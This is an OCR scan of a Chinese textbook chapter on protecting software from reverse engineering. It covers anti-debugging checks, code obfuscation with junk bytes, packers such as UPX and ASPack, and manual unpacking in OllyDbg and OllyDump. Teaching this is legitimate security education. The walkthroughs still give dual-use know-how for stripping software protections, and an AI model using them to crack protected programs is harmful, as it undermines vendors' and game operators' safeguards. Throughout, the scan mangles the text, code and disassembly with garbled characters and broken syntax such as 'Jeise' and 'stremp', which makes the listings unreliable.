后 我 们 可 不 太 想 被 别人 拿 去 分 析 。 而 且 ， 像 一 些 和 金钱 相关 的 软件 ， 或 
者 网 络 游戏 ， 如 果 其 核心 逻辑 和 数据 被 别人 做 了 手脚 ， 那 么 服务 本 身 可 
能 就 难以 维系 了 。 

有 很 多 技术 可 以 防止 软件 被 逆向 工程 ， 下 面 我 们 就 来 看 其 中 的 
几 个 。 

最 初级 的 一 种 反 调试 技术 是 IIDebuggerPresent。 

IsDebuggerPresent 是 一 种 能 够 检测 是 否 挂 载 了 调试 器 的 API 函数 ， 
通过 返回 值 是 否 为 0 可 以 判断 调试 器 的 挂 载 状态 。 













































































#include «Windows.h» 
#include <stdio.h> 


int main() 
{ 
if (IsDebuggerPresent () ) { 
// 在 调试 器 上 运行 
printf("on debugger\n") ; 
Jeise( 
// 在 调试 器 上 不 运行 
printf("not on debugger\n") ; 








} 
getchar(); 


return 0; 
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如 果 和 希望 在 开发 时 方便 调试 ， 又 要 在 发 布 之 后 防止 被 破解 ， 这 一 函 
数 非 常 有 用 。 我 们 可 以 在 开发 时 用 ifdef 或 者 注释 来 暂时 禁用 
IsDebuggerPresent 的 调用 ， 在 发 布 版 上 再 启用 ， 在 检测 到 调试 器 时 改变 
程序 的 逻辑 。 

除 此 之 外 还 有 其 他 一 些 类 似 的 API 函数 , 如 CheckRemoteDebuggerPresent。 

















BOOL WINAPI CheckRemoteDebuggerPresent ( 
In HANDLE hProcess, 


_Inout_ PBOOL pbDebuggerPresent 





一 专栏 : 检测 调试 器 的 各 种 方法 

除了 API 函数 以 外 ， 还 有 很 多 其 他 类 型 的 技术 被 用 于 检测 调试 
器 ， 其 中 有 很 多 都 很 有 趣 ， 下 面 我 们 来 简单 介绍 一 下 。 
首先 是 利用 popf 和 SINGLE. STEP 异常 来 检测 调试 器 的 方法 。 
当 返 回 值 为 0 时 为 正常 ， 为 1 则 表示 挂 载 了 调试 器 。 下 面 的 代码 是 
什么 原理 ， 大 家 能 看 懂 吗 ? 

















































































































. declspec(naked) int T stdcall antidebugger1 (void) 
{ 
. asm( 
pushad 
push ok 
push dword ptr fs: [0] 
mov dword ptr fs:[0], esp 
mov buff, esp 


push 100h 用 push 将 100h 入 栈 
popf 用 pop 将 100h 取 出 至 标志 
jmp error 


ok: 
mov esp, buff 
pop dword ptr fs: [0] 
add esp, 4 
popad 





xor eax, eax 














第 2 章 ENR P RIL REM 














ret 
error: 
mov esp, buff 
pop dword ptr fs: [0] 


add esp, 4 
popad 

xor eax, eax 
inc eax 

ret 





还 有 一 种 类 似 的 方法 ， 用 的 是 int 2dh。 











__declspec(naked) int . stdcall antidebugger2 (void) 
{ 
__asm{ 
pushad 
push ok 
push dword ptr fs: [0] 
mov dword ptr fs:[0], esp 
mov buff, esp 
xor eax, eax 
int 2dh 执行 int 2dh 
jmp error 
ok: 
mov esp, buff 
pop dword ptr fs: [0] 
add esp, 4 
popad 
xor eax, eax 
ret 
error: 
mov esp, buff 
pop dword ptr fs: [0] 
add esp, 4 
popad 
xor eax, eax 
inc eax 


VEE 
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和 上 面 一 样 ， 返 回 0 为 正常 ， 返 区 
EMM REAR IEA 
ERRERA, WRAK 

int2d" iX 












































^ 



































debug popf” #0 “anti-debug 


感 兴 8 


1 表示 挂 载 了 调试 器 。 
epu 




















TARE, AEE 





























J 以 上 网 搜索 “anti- 


a i 





2.2.2 通过 代码 混淆 来 防止 分 析 
上 述 反 调试 器 技术 十 分 有 效 ， 但 如 果 











j 反 汇编 器 进行 静态 分 析 ， 找 








到 检测 调试 器 的 逻辑 ( 例如 调用 IsDebuggerPresent 的 地 方 )， 就 可 以 轻 


易 破解 。 


00401000 main proc near 


00401000 call ds: imp . 

00401006 test eax, eax 

00401008 JZ short loc 401021 
0040100A push offset aOnDebugger ; 
0040100F call ds: imp printf 
00401015 add esp, 4 

00401018 call ds: imp getchar 
0040101E xor eax, eax 

00401020 retn 

00401021 loc 401021: 

00401021 push offset aNotOnDebugger ; 
00401026 call ds: imp printf 
0040102C add esp, 4 

0040102F call ds: imp getchar 
00401035 xor eax, eax 

00401037 retn 


即便 使 用 了 这 些 反 调试 技术 ， 














IsDebuggerPresent@0 改写 


"on debugger\n" 


"not on debugger\n" 





过 IDA 也 都 可 以 进行 分 析 并 将 其 破 


解 。 当 然 ， oe D EE 也 一 样 能 够 找到 检测 调试 
LRL 
那么 ， 如 何 防止 代码 被 分 析 呢 ? 有 一 种 方法 被 称 为 “混淆 ”， 顾 名 














思 义 ， 就 是 让 代码 变 得 难以 看 懂 。 


下 面 我 们 来 看 一 个 代码 混淆 的 例子 。 
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调用 IsDebuggerPresent 的 部 分 ， 其 机 器 语言 代码 为 FF 15 00 20 40 
00 85 CO 74 17 (截止 到 jz 指令 )。 


00401000 main proc near 

00401000 FF 15 00 20 40 00 call ds: imp IsDebuggerPresent9G0 
00401006 85 CO test eax, eax 

00401008 74 17 Jz short loc 401021 


这 里 ， 如 果 我 们 在 前 面 增加 一 个 EB， 即 变 成 EB FF 15 00 20 40 00 
85 C0 74 17, Æ IDA 中 显示 出 的 代码 就 会 变 成 下 面 这 样 。 

















00401000 main: 

00401000 EB FF jmp short near ptr main«1 
00401002 15 00 20 40 00 adc eax, offset imp __ 
IsDebuggerPresent@0 

00401007 85 CO test eax, eax 

00401009 74 17 Jz short loc 401022 


我 们 可 以 看 到 ， 这 里 的 指令 变 成 了 jmp. adc, test, jz, m call 指令 
消失 了 ， 然 而 这 段 机 器 语言 的 实际 功能 却 没有 发 生变 化 ， 因 为 EB FF fH 
当 于 向 前 跳 转 1 个 字 节 ， 也 就 是 跳 转 到 00401001 。 

而 00401001 后 面 的 机 器 语言 代码 为 FF 15 00 20 40 00 85 CO 74 17, 
这 段 代 码 反 汇编 之 后 得 到 的 指令 是 call 、test、jz， 因 此 call 依然 能 够 正 
常 执行 。 

这 里 的 关键 点 在 于 00401001 处 的 FF， 它 可 以 当 作 前 面 jmp 指令 的 
一 部 分 ， 也 可 以 当 作 后 面 call 指令 的 一 部 分 。 而 IDA 会 从 前 往 后 按 顺 序 
进行 反 汇编 ， 因 此 显示 出 的 代码 可 能 会 和 实际 执行 的 代码 不 同 。 

这 样 的 技术 就 称 为 混 消 。 



























































专栏 : 代码 混淆 的 相关 话题 
无 论 是 软件 还 是 硬件 领域 ， 逆 向 工程 的 攻防 战 都 已 经 有 很 长 的 
历史 。 关 于 代码 混淆 的 研究 也 从 很 早 就 开始 了 ， 网 上 也 发 布 了 很 多 


益 的 论文 。 
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e Obfuscation of executable code to improve resistance to 
static disassembly. 


http://www.cs.arizona.edu/solar/papers/CCS2003.pdf 


* Binary Obfuscation Using Signals. 


https://www.cs.arizona.edu/solar/papers/obf-signal.pdf 


系统 内 部 结构 抵御 分 析 的 能 力 被 称 为 “ 抗 自 改 性 ”( tamper 
resistance )， 这 不 仅 限 于 软件 领域 ， 在 硬件 领域 也 在 进行 相关 研究 。 

“如 何 保卫 信息 安全 ” 

“怎样 的 设计 能 够 实现 高 抗 自 改 性 的 系统 ” 

这 些 都 是 计算 机 安全 领域 的 重大 课题 。 在 如 今 的 信息 化 社会 中 ， 
“如 何 保卫 信息 安全 ”是 一 个 根本 性 的 问题 。 





































































































2.2.8 ”将 可 执行 文件 进行 压缩 

除了 反 调 试 、 混 淆 之 外 ， 还 有 一 些 能 够 防止 软件 分 析 的 方法 。 比 
如 ， 有 一 种 技术 能 够 将 可 执行 文件 进行 压缩 ， 压 缩 后 得 到 的 文件 依然 可 
以 直接 运行 。 

这 一 类 压缩 工具 称 为 打包 器 (packer )， 其 中 最 有 名 的 一 款 打 包 器 叫 
作 UPX， 它 是 开源 的 ， 支 持 ELF、DLL、COFF 等 多 种 可 执行 文件 格式 。 














e UPX 
http://upx.sourceforge.net/ 


打包 需 的 原理 非常 简单 ， 就 是 将 原本 可 执行 文件 中 的 代码 和 数据 进行 
压缩 ， 然 后 将 解压 缩 用 的 代码 附加 在 前 面 ， 运 行 的 时 候 先 将 原本 的 可 执行 
数据 解压 缩 出 来 ， 然 后 再 运行 解压 缩 后 的 数据 。UPX 的 逻辑 也 正 是 如 此 。 
也 有 一 些 打包 需 的 目的 不 是 压缩 ， 而 是 反 调 试 (防止 逆向 工程 )。 
例如 几 年 前 十 分 流行 的 P2P 文件 分 享 交换 软件 Winny^ 就 使 用 了 一 种 叫 


四 Winny 基本 上 只 在 日 本 流行 ， 原 理 类 似 电 驴 ， 曾 经 有 很 多 国内 的 字幕 组 用 Winny 
从 日 本 获取 高 清 片 源 。 译 者 注 
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VE ASPack 的 打包 器 。 


e ASPack 


http://www.aspack.com/ 


从 其 性 质 上 说 ，Winny 的 通信 内 容 及 其 密码 算法 是 需要 保密 的 ， 
此 它 使 用 了 打包 器 来 作为 反 调试 ( 防止 逆向 工程 ) 的 手段 。 

此 外 ， 现 在 的 打包 器 基本 上 都 具备 防止 逆向 工程 的 功能 ， 因 此 很 多 
恶意 软件 制作 者 也 会 使 用 打包 器 ， 目 的 是 为 反 病毒 软件 厂商 的 分 析 制 造 
困难 (或 者 是 改变 自身 的 特征 码 )。 



































区 打包 器 能 够 在 多 大 程度 上 提高 分 析 的 难度 ? 
使 用 打包 需 之 后 分 析 的 难度 会 提高 多 少 呢 ? 下 面 让 我 们 来 实际 体验 
Pg 

首先 ， 我 们 编写 下 面 这 段 程序 ( 源 代码 位 于 chap02\packed\packed )。 









































V packed.cpp 


#include <Windows.h> 
#include <stdio.h> 


int main(int argc, char *argv[] 
{ 
if(argc < 2){ 
fprintf(stderr, "$packed.exe <password>\n") ; 
return 1; 
} 
if (IsDebuggerPresent () ) { 
// 在 调试 器 上 运行 
printf ("on debugger n"); 
return -1; 
Jeise( 
// 在 调试 器 上 不 运行 
if(stremp(argv[1], "xxxxxxxxx") == 0) { 
printf ("correct !\n") ; 
Jeise( 


} 
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printf("auth error\n") ; 


return -1; 


getchar(); 


return 0; 


这 个 程序 很 简单 。 

















= 











首先 它 会 调用 IsDebuggerPresent 检测 调试 器 是 否 存在 。 
然后 ， 如 果 向 程序 传递 的 参数 为 xxxxxxxxx 这 个 字符 串 


pu 





correct!， 否 则 显示 auth error. 


下 面 我 们 编译 这 段 代 码 ， 然 后 用 IDA 来 看 一 下 。 




















V packed.exe 


00401000 main 


00401000 
00401000 
00401000 
00401001 
00401003 
00401007 
00401009 
0040100E 
00401014 
00401017 
00401018 
0040101E 
00401021 
00401026 
00401027 
00401028 
00401028 
0040102E 
00401030 
00401032 
00401037 
0040103D 
00401040 


proc near 


arg_0 = dword ptr 8 


arg 4 = dword ptr OCh 


push 
mov 
cmp 
jge 
push 
call 
add 
push 
cani! 
add 
mov 
pop 
retn 
loc 401028: 
call 
lest 
jz 
push 
ea 
add 


(ele 


ebp 

ebp, esp 

[ebp«arg 0], 2 

short loc 401028 

offset "Spacked.exe <password>\n" 


doc ihe Ho) ol naib ale) 
eax, 40h 

eax 2 FILE * 

ds: imp fprintf 
esp, 8 

eax, 1 

ebp 


ds: imp  IsDebuggerPresente0 

eax, eax 

short loc 401045 

offset aOnDebugger ; "on debugger\n" 
ds: imp  printf 

esp, 4 

eax, OFFFFFFFFh 





， 则 显示 
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00401043 pop ebp 
00401044 retn 
00401045 loc 401045: 
00401045 mov eax, [ebptarg 4] 
00401048 mov eax, [eax+4] 
0040104B mov ecx, Offset BaXXXXXXXX 7 "XKXXXXKX" 
00401050 loc 401050: 
00401050 mov dl, [eax] 
00401052 cmp dl, [ecx] 
00401054 jnz short loc 401070 
00401056 test Chka Eul 
00401058 JZ short loc 40106C 
0040105A mov dl, [eax+1] 
0040105D cmp dl, [ecx+1] 
00401060 jnz short loc 401070 
00401062 add eax, 2 
00401065 add ecx, 2 
00401068 cest Gil. Eul 
0040106A jnz short loc 401050 
0040106C loc 40106C: 
0040106C xor eax, eax 
0040106E jmp short loc_401075 
00401070 loc 401070: 
00401070 sbb eax, eax 
00401072 sbb eax, OFFFFFFFFh 
00401075 loc 401075: 
00401075 test eax, eax 
00401077 jnz short loc_401091 
00401079 push offset aCorrect ; "correct!\n" 
0040107E call ds:__imp__ printf 
00401084 add esp, 4 
00401087 call ds: imp getchar 
0040108D xor eax, eax 
0040108F pop ebp 
00401090 retn 
00401091 loc 401091: 
00401091 push offset aAuthError ; "auth error\n" 
00401096 call ds: imp printf 
0040109C add esp, 4 
0040109F or eax, OFFFFFFFFh 
004010A2 pop ebp 


004010A3 retn 
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请 大 家 看 一 下 反 汇编 之 后 的 代码 ， 感 觉 如 何 ? 无 论 是 程序 逻辑 和 流 
程 ， 还 是 用 于 对 比 参数 的 字符 串 ， 以 及 输出 的 内 容 ， 都 原原本本 地 展现 
了 出 来 。 大 家 是 不 是 感觉 分 析 这 段 程序 还 挺 容易 的 呢 ? 

下 面 我 们 用 UPX 打包 。 























v 运行 示例 


C:Vupx308w»upx.exe packed.exe 
省 略 
File size Ratio 


Tabs. oe 5120 71.43$ win32/pe 


packed.exe 
Packed 1 file. 


我 们 将 packed.exe 作为 参数 运行 upx.exe， 然 后 packed.exe 会 被 覆盖 
为 经 过 UPX 压缩 后 的 文件 。 
下 面 我 们 再 用 IDA 打开 看 看 。 

















v 打包 后 的 packed.exe 1 
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V 打包 后 的 packed.exe 2 












































m 
mov ebx, [edi 
lea eax, [eax 
add ebx, esi 
push eax 
ack 


id edi R 
(0532309) | (883165) | 00000000 | 00407900: start 





可 以 发 现 ， 里面 的 程序 完全 看 不 懂 了 。 

用 二 进 制 编辑 器 打开 可 执行 文件 ， 我 们 也 无 法 找到 correct!、auth 
error 等 字符 串 。 原 本 非常 简单 的 程序 现在 变 得 如 此 复杂 ， 这 也 正 是 打包 
带 能 够 防止 逆向 工程 的 原因 。 














2.2.4 将 压缩 过 的 可 执行 文件 解压 缩 : 解 包 

“既然 有 压缩 的 工具 ， 那 也 一 定 有 解压 缩 的 工具 吧 ?” 

你 真是 太 聪 明了 ! 答案 是 肯定 的 。 将 用 打包 器 压缩 的 可 执行 文件 解 
压缩 的 工具 称 为 解 包 需 (unpacker )。 

一 般 来 说 ， 打 包 器 和 解 包 器 都 是 各 自 相 互 匹 配 的 ， 例 如 ASPack 的 
解 包 器 、UPX 的 解 包 器 。 顺 便 一 提 ，UPX 其 实 没 有 专门 的 解 包 器 ， 因 
为 只 要 加 上 -d 选项 就 可 以 进行 解 包 了 。 

除了 UPX 之 外 ， 以 防止 逆向 工程 为 目的 的 打包 器 ,通常 都 没有 官 
方 解 包 器 。 因 此 ， 要 想 解 包 只 能 自力 更 生 手 动 完成 ， 或 者 也 可 以 使 用 某 
些 第 三 方 制作 的 解 包 工具 。 

所 谓 “ 手 动 解 包 "， 顾 名 思 义 ， 就 是 用 调试 器 和 反 汇 编 器 跟踪 可 执 
行文 件 解压 缩 的 逻辑 ， 并 将 位 于 内 存 中 的 解压 缩 后 的 可 执行 数据 导出 到 
文件 的 操作 。 

当然 ， 每 种 打包 器 的 压缩 算法 都 不 同 ， 如 果 解 包 器 本 身 还 附带 反 
调试 代码 就 会 让 分 析 变 得 更 加 困难 。 打 包 器 的确 为 软件 分 析 者 制造 了 
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很 多 麻烦 。 
由 于 UPX 并 不 是 一 款 以 反 调 试 为 目的 的 打包 融 ， 因 此 只 要 加 上 -d 
选项 再 执行 一 次 就 可 以 解 包 了 。 








C:\upx308w>upx.exe -d packed.exe 
省 略 
File size Ratio Format Name 


VS e 5120 71.43$ win32/pe packed.exe 
Unpacked 1 file. 





尽管 无 法 还 原 到 一 模 一 样 ， 但 至 少 现在 我 们 可 以 用 IDA 来 进行 分 
析 了 。 





2.25 ”通过 手动 解 包 UPX 来 理解 其 工作 原理 


不 过 ， 我 们 无 法 通过 自动 解 包 来 理解 打包 器 的 原理 ， 因 此 下 面 我 们 
来 尝试 一 下 手动 解 包 用 UPX 压缩 过 的 程序 。 

不 同 的 打包 器 的 解 包 难 度 是 不 同 的 ，UPX 是 一 种 非常 简单 的 打包 
器 ， 因 此 十 分 适合 用 来 练习 解 包 。 下 面 我 们 尝试 一 下 对 用 UPX 打包 的 
packed.exe 进行 手动 解 包 。 
首先 ， 我 们 用 OllyDbg 打开 packed.exe。 这 次 我 们 使 用 一 个 叫 作 
OllyDump 的 OllyDbg 插件 ， 请 大 家 将 OllyDump.dll 复制 到 OLLYDBG. 
EXE 所 在 的 目录 下 ， 这 样 我 们 就 可 以 使 用 OllyDump 插件 了 。 




































































e OllyDump 
http://www.openrce.org/downloads/details/108/OllyDump 


V 运行 结果 
004079C0 > $ 60 PUSHAD 
004079C1 . BE 00704000 MOV ESI,packed.00407000 


004079C6 . 8DBE O0AO0FFFF LEA EDI,DWORD PTR DS: [ESI+FFFFA000] 





88 | 











$8238 EB XX p IEEE SE 


用 OllyDbg 打开 之 后 ， 我 们 来 看 一 下 开头 的 pushad 指令 。pushad 


指令 的 功能 是 将 所 有 寄存 器 的 值 撤退 
这 样 做 ， 先 按 FS 继续 运行 
就 可 以 了 。 
按 了 
TAR 
004079D0 > 8A06 
004079D2 . 46 
004079D3 . 8807 
004079D5 2017 
004079D6 > O1DB 
004079D8 . 75 07 
004079DA > 8B1E 
004079DC . 83EE FC 
004079DF è. 11DB 
004079E1 S72) isp) 
面 这 段 就 是 循环 的 内 容 ， 


AfTe 


(复制 ) 到 栈 。 我 们 暂且 不 管 为 什 
这 里 先 不 用 多 想 ， 不 断 按 F8 运行 下 去 





一 段 时 间 F8 之 后 ,我们 会 发 现 程序 在 某 个 地 方 进 入 了 一 个 循环 。 


MOV AL,BYTE PTR DS: [ESI] 
INC ESI 

BYTE PTR DS: [EDI] , AL 
EDI 

EBX,EBX 

SHORT packed.004079E1 
EBX,DWORD PTR DS: [ESI] 
ESI,-4 

ADC EBX,EBX 

JB SHORT packed.004079D0 


我 们 仔细 看 一 下 里 面 的 逻辑 ， 会 发 现 这 


是 在 从 esi 的 地 址 向 edi 的 地 址 复制 数据 。 从 复制 的 目标 ， 即 edi 的 地 址 


可 以 看 出 ， 


这 里 是 从 00401000 开始 逐 








aep tt s mim s 








我 们 按 F8 继续 运行 ， 如 





























Hc F8 太 麻 烦 ， 可 以 在 代码 里 面 一 直 向 





下 查找 到 popad 指令 ， 然 后 在 这 里 设置 一 个 断 点 ， 并 按 FO 运行 到 断 点 





的 位 置 。 

v 运行 结果 
00407B66 s al 
00407B67 . 8D4424 80 
00407B6B > 6A 00 
00407B6D . 39C4 
00407B6F .^75 FA 
00407B71 . 83EC 80 
00407B74 .-E9 C897FFFF 





POPAD 

LEA EAX,DWORD PTR SS: 
PUSH 0 

CMP ESP,EAX 

JNZ SHORT packed.00407B6B 
SUB ESP,-80 

JMP packed.00401341 


[ESP-80] 





我 们 可 以 看 到 popad FÉ 








i 不 远 处 ， 在 00407B74 有 一 个 jmp 指令 
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jit F8 单 步 运行 到 jmp 指令 的 地 方 ， 会 跳 转 到 00401341 处 的 一 条 call 指 
4 E, 


V 运行 结果 


00401341 E8 83040000 CALL packed.004017C9 
00401346 ^E9 B3FDFFFF JMP packed.004010FE 





在 00401341 这 个 位 置 ， 我 们 打开 OllyDump， 点 击 OllyDbg 菜单 中 





的 Plug-in —> OllyDump — Dump debugged process. 


V 用 OllyDump 将 内 存 中 的 可 执行 数据 转 储 到 文件 


OllyDump - packed.exe 


Start Address: |400000 Size: {9000 
Entry Point: frsco -> Modify: [1341 Get EIP as OEP | Cancel 


Base of Code: |7000 Base of Data: |8000 


IV Fix Raw Size & Offset of Dump Image 


Virtual Offset | Raw Size — | Raw Offset 
UPX0 00005000 00001000 + 00005000 00001000  ED000080 
UFX1 00001000 00007000 00001000 ^ 00007000  EDDD0040 
ase 00007000 00008000 00001000 ^ 00008000 C0000040 


IV Rebuild Import 
(^ Method] : Search JMP[API 





在 对 话 框 最 下 面 的 Rebuild Import 中 选择 Method2, ， 其 他 选项 保留 
默认 值 。 

接 下 来 按 窗口 右上 方 的 Dump 按钮， 内存 中 的 可 执行 数据 就 会 被 转 
储 到 文件 中 。 

这 样 我 们 就 完成 了 解 包 操作 。 

现在 我 们 可 以 关闭 OllyDbg 了 ,不 过 建议 大 家 去 看 一 眼 00401000 
以 后 的 代码 ， 看 起 来 是 不 是 特别 眼熟 ? 
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V UPX 解压 缩 之 后 的 代码 


OllyDbg — upxpacked.exe — [CPU — main thread, module upxpacke] 


[c] File View Debug Plugins Options Window Help 





Sax wu] wis sea | sj ul elm) wec ee] iii 














00401000 Em TOU E e 
a 
a 8800 68 a2 CHP BUORD | PTR SS: CEBP+81,2 
v?D 1F E SHORT upspacke. 00401028 
68 F4204000 PUSH upspacke.aa4a2aF4 ASCII "Spacked. se €password2E" 
FF1S A8204000 | CALL DWORD PTR DS:[4020A8] MSUCR1GB. p i 
Ssca 40 ADD EAX, 40 
5a PUSH ERX 
FF15 A0204000 PETE QUORD PTR DS: [4020A0] MSUCR100. fprintf 
B8 01000000 MOU EAX, 1 
d CON EBP 
FF1S 96264606 |CALL DWORD PTR DS:[402000] kernel32.IsDebuggerPresent 
ssca TEST EAX, EAX 
{v74 13 JE SHORT. upspacke. Uere 
68 BC214666 PUSH upspacke. 68462161 ASCII "on debuggerg” 
FF15 A4204000 DEL Dion D PTR DS: E4620n41 HSUCR1868. printf 
8304 a4 ADD ESP,4 
ES FF Ed EAX; ,FFFFFFFF 
C3 
8B45 ØC fou "Ens, DWORD PTR SS:[EBP+C] 
8B40 04 MOV EAX, DWORD PTR DS: LER UT 
B9 102146906 Hou ECX, upspacke. 0040211 ASCII "unpack ing” 
8A10 MOV DL, BYTE PTR DS: rE 
3A11 CMP DL,BYTE PTR DS: 
54|v?5 1R JNz SHORT upspacke. bodoia70 





此 外 ， 请 大 家 用 IDA 打开 导出 后 的 文件 ， 然 后 看 一 下 地 址 
00401000 以 后 的 代码 ， 应 该 和 我 们 最 初 编写 的 代码 一 模 一 样 。 

那么 ， 我 们 用 OllyDbg 和 OllyDump 到 底 做 了 什么 呢 ? 

答案 很 简单 ， 就 是 将 打包 需 添 加 的 用 于 解压 缩 的 那 部 分 代码 在 
OllyDbg 上 运行 ， 然 后 将 解压 缩 到 内 存 中 的 可 执行 数据 用 OllyDump f£ 
储 到 文件 中 。 其 实 ， 开 头 的 pushad 和 最 后 的 popad 中 间 的 逻辑 就 是 用 于 
解压 缩 的 程序 。 

具体 来 说 ， 在 运行 解压 缩 程序 之 前 ， 先 将 当前 的 寄存 器 状态 保存 到 
栈 中 ,在 解压 缩 结 束 之 后 再 从 栈 中 恢复 寄存 器 状态 。 这 样 一 来 ， 寄 存 器 
的 值 就 恢复 到 了 运行 解压 缩 程 序 之 前 的 状态 ， 便 于 正确 运行 解压 缩 之 后 
的 真正 的 程序 代码 。 

尽管 也 有 例外 ， 但 大 部 分 打包 器 都 是 这 样 的 原理 ， 因 此 一 定 会 在 某 
个 时 间 点 完成 解压 缩 ， 然 后 切换 到 真正 的 程序 。 因 此 可 以 说 ， 手 动 解 包 
的 关键 就 是 “找到 解压 缩 程序 结束 的 瞬间 ( 位置》。 









































I 
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22.6 ”用 硬件 断 点 对 ASPack 进行 解 包 


有 了 UPX 的 经 验 ， 下 面 我 们 来 挑战 一 下 ASPack 的 解 包 。ASPack 
的 免费 版 ”可 以 从 下 面 的 网 站 下 载 。 





e ASPack Software 
http://www.aspack.com/ 


V 启动 ASPack 


$ ASPack 2.28 





Win32 EXE, DLL compressor 


UNREGISTERED 


Version 2.28 30 days 








Open File | Compress | Options | About | Help | 








File information 





File name 





File size [before compression) 


History 














对 于 ASPack 的 解 包 ， 基 本 方法 也 是 找到 和 pushad 相对 应 的 popad。 
只 不 过 ， 要 找到 相对 应 的 popad 非常 困难 ， 因 此 我 们 需要 使 用 “ 硬 
件 断 点 ”。 
那么 ,硬件 断 点 和 我 们 前 面 讲 过 的 断 点 有 什么 区 别 呢 ? 
其 实 ， 我 们 之 前 用 到 的 断 点 ， 准 确 来 说 应 该 叫 作 “软件 断 点 ”。 
实际 上 ， 软 件 断 点 的 原理 很 简单 ， 其 本 质 是 调试 带 将 断 点 位 置 的 指 
令 改写 成 了 0xCC ( int3h )。 处 理 需 遇 到 0xCC 指令 ,会 通过 操作 系统 将 
异常 报告 给 调试 器 ， 因 此 ， 只 要 在 指定 位 置 写 信 0xCC， 就 可 以 在 任意 






































O 准确 地 说 不 是 免费 版 ， 而 是 30 天 免费 试用 版 。 译 者 注 





92 | 第 2 章 在 射击 游戏 中 防止 玩家 作弊 











的 时 间 和 位 置 中 断 程序 运行 。 

那么 ， 硬 件 断 点 又 是 怎么 一 回 事 呢 ? 和 软件 断 点 一 样 ， 硬 件 断 点 也 
可 以 中 断 程序 运行 并 向 调试 器 发 出 报告 ， 但 它 并 非 通过 0xCC 指令 来 实 
现 ， 而 是 通过 直接 写 人 寄存 器 〈DR 寄存 带 ) 来 实现 的 。 
此 外 ， 硬 件 断 点 不 仅 能 够 在 指定 的 位 置 中 断 程序 运行 ， 还 可 以 实现 
一 些 复 杂 的 中 断 ， 例 如 “ 当 向 指定 地 址 写 和 人 数据 时 中 断 ”“ 当 从 指定 地 
址 读 取 数 据 时 中 断 ” 等 。 换 句 话说， 硬件 断 点 比 软件 断 点 的 功能 要 强大 
一 些 。 

“既然 如 此 ， 那 干脆 都 用 硬件 断 点 不 就 好 了 吗 ? 为 什么 还 要 用 软件 
断 点 呢 ?” 

理由 很 简单 ， 因 为 硬件 断 点 数量 有 限 。 软 件 断 点 的 设置 数量 是 没有 
限制 的 ， 但 硬件 断 点 却 只 能 设置 4 个 (因为 处 理 器 只 设计 了 4 个 硬件 断 
点 )， 因 此 它们 还 是 各 有 利 次 的 。 

在 进行 软件 分 析 的 过 程 中 ， 遇 到 0xCC 可 能 会 被 覆盖 的 情况 时 ， 一 
般 会 使 用 硬件 断 点 ”。 

用 OllyDbg 打开 用 ASPack 打包 的 可 执行 文件 ， 会 显示 以 下 指令 。 

























































































V 运行 结果 
00406001 > 60 PUSHAD 
00406002 E8 03000000 CALL packerpa.0040600A 
00406007 -E9 EB045D45 JMP 459D64F7 





我 们 一 直 往 下 找 ， 肯 定 能 找到 一 个 POPAD, 但 是 这 样 找 太 累 了 ， 
我 们 可 以 在 00401000 地 址 设置 一 个 硬件 断 点 。 要 注意 的 是 ， 如 果 操 作 
系统 启用 了 ASLR? 安全 机 制 ， 那 么 这 个 地 址 有 可 能 不 是 00401000, TE 
这 样 的 情况 下 就 只 能 乖乖 地 自己 去 找 POPAD 了 。 

在 反 汇 编 窗口 中 按 下 Ctrl+G， 在 弹出 的 对 话 框 中 输入 “00401000”， 














(D 这 里 的 意思 是 ， 打 包 器 在 向 内 存 写 入 解 包 后 的 可 执行 数据 时 ， 会 覆盖 掉 其 中 的 软 








件 断 点 ， 因 此 这 里 只 能 使 用 硬件 断 点 。 译 者 注 
Q 关于 ASLR 将 在 第 3 章 进行 介绍 。 译 者 注 
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这 时 反 汇 编 窗口 中 会 显示 出 00401000 以 后 的 指令 。 


V 运行 结果 


00401000 10 DB 10 
00401001 4B DB 4B 
00401002 34 DB 34 


由 于 可 执行 数据 还 没有 解 包 ， 因 此 现在 这 些 数据 是 无 法 进行 反 汇 
编 的 。 
接 下 来 我 们 在 00401000 处 设置 一 个 硬件 断 点 ， 按 右键 一 Breakpoint 


一 Hardware, on execution。 





设置 硬件 断 点 


[C] File View Debug Plugins Options Window Help 





[E EL cE} Hu pup ag em] rwa] c]v ]k]B]R]--] s SET] 






















00401001 Backup > 


(mule 

















0040 1002 21 

8040 

889461964| 99 Copy [a 

00401005 19 Binary > > 
pa Modify byte ] 

00401009 

Eas) OES Assemble Space i 








Label 


Comment 
























eun B Rem i 
euis m Laien duc 2x 
sees d 一 一 一 一 q B pst n i i 
00401016 A4 soe ER D 
gogorre] 42 Ta ee here teiega ; 
emu. B a eae 
Ep m DIXON. 1A Uap. emory, on write : 
mon ， | 
eus) B ind referent ， 
00401022 EA ig 
1 2 Copy to executable » 

Analysis » 

Bookmark [à 








Dump debugged process 





00403010 
00403018 
99493020] 6B 26 EC 
ARAARAD 


这 样 即 准备 完毕 。 

接 下 来 ， 按 F9 运行 程序 ， 然 后 程序 会 在 00401000 处 中 断 运 行 。 
此 时 ， 可 执行 数据 已 经 完成 了 解 包 ， 如 果 画 面 上 没有 显示 出 反 汇编 

后 的 代码 ， 可 以 按 下 Ctrl-A, OllyDbg 会 重新 分 析 程序 代码 。 





Appearance 
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v 运行 示例 


00401000 /$ 55 





00401001 . 8BEC 

00401003 . 837D 08 02 

00401007 < 7D 1F 

00401009 . 68 F4204000 

0040100E . FF15 A8204000 

00401014 . 83C0 40 

00401017 2050) 

00401018 . FF15 A0204000 
V 解 包 后 的 代码 
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PUSH EBP 

MOV EBP,ESP 

CMP DWORD PTR SS: [EBP+8] ,2 

JGE SHORT packerpa.00401028 
PUSH packerpa.004020F4 

CALL DWORD PTR DS: [4020A8] 

ADD EAX, 40 

PUSH EAX 

CALL DWORD PTR DS: [4020A0] 


OllyDbg — aspackpacked. exe — [CPU — main thread, module aspackpal 


[c] File View Debug Plugins Options 


Window Help 














. MOU El 
. 3370 as a2 
Iw D En 


: BS 01000000 
5D 


80401040 
9040184 











5D POP 








后 面 的 操作 就 和 UPX 完全 一 样 了 ， 











解 包 工作 就 完成 了 。 


本 章 中 我 们 实践 了 对 UPX 和 ASPack 的 解 包 ， 除 此 之 外 ， 





BP, ESP 
CMP DWORD PTR SS: [EBP+8], 2 
JGE SHORT aspackpa. 00401028 
. F4204 PUSH aspackpa. 664020F4 
. Pris tt CALL DWORD PTR DS:L4G28891 
. 8300 40 ADD EAX, 40 


. 58 PUSH EAX 
. FF15 A0204000 EL DWORD PTR DS: [4629R6] 


. C3 
> FF15 00204000 CET DWORD PTR ODS: [48268688] 
. 85ca JES EAX, EAX 

